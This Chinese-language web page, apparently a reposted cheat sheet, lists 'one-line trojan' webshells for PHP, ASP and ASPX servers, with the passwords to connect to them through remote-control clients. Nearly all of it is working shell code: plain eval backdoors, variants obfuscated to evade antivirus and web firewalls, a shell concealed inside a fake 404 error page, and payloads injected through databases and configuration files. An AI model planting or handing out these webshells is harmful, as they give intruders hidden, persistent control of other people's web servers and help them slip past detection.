常見的一句話木馬


1、普通一句話:

1
2
3
<?php
@ eval ($_POST[123456]);
?>

*post后面中括號里面的內容是使用菜刀或蟻劍連接時的密碼

2、防爆破一句話:

1
2
3
4
<?php
substr(md5($_REQUEST[ 'x' ]),28)== '6862' && eval ($_REQUEST[ 'password' ]);
?>
*菜刀地址http: //192 .168.64.137 /x .php?x=myh0st

3、過狗一句話:

1
2
3
4
5
<?php
($_=@$_GET[s]).@$_($_POST[hihack])
?>  // 菜刀地址 http: //localhost/1 .php?s=assert
<php $a =  "a" . "s" . "s" . "e" . "r" . "t" ; $a($_POST[hihack]);
?>

4、404隱藏的一句話:

1
2
3
4
5
6
7
8
9
10
<!DOCTYPE HTML PUBLIC  "-//IETF//DTD HTML 2.0//EN" >
<html>< head >
<title>404 Not Found< /title >
< /head ><body>
<h1>Not Found< /h1 >
<p>The requested URL  /error .php was not found on this server. < /p >
< /body >< /html >
<?php
@preg_replace( "/[checksql]/e" ,$_POST[ 'hihack' ], "saft" );
?>

菜刀連接時在配置欄添加:

1
<O> date =@ eval ($_POST[paxmac]);< /O >

5、不用問號(?)的一句話:

1
<script language= "php" > eval  ($_POST[hihack]);< /script >

6、躲避檢測:

1
<?php assert($_REQUEST[ "hihack" ]);?>

7、變形一句話后門:

1
訪問該網頁,然后菜刀連接: /myh0st .php 密碼:hihack

ASP一句話:

1、普通一句話:

1
<% eval  request( "hihack" )%>或<%execute(request( "hihack" ))%>

2、unicode編碼的access木馬 :

1
向access數據庫插入 ┼攠數畣整爠煥敵瑳∨≡┩> 編碼前:<% execute request( "a" )%>

然后備份出webshell,密碼a

3、配置文件插馬(需要條件支持,插入的數據被寫在了配置文件中):

1
插入: "%><% bbbb=request(" aaaa")%><%eval(bbbb)%><%'

訪問報錯,獲取到配置文件的地址,然后連接,密碼aaaa

4、不用%的一句話:

1
<script language=VBScript runat=server>execute request( "hihack" )</script>

5、不用雙引號(“)的一句話:

1
<% eval  request(chr(35))%> 密碼: #

ASPX一句話:

1、普通一句話:

1
<%@ Page Language=”Jscript”%> <%eval(Request.Item[“hihack”],”unsafe”);%>

2、免殺一句話:

1
<%@PAGE LANGUAGE=JSCRIPT%><% var  PAY:String=Request[“x61x62x63x64”];eval(PAY,”x75x6Ex73x61”+”x66x65”);%>

轉自http://bbs.tiger2019.cn/?thread-187.htm


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM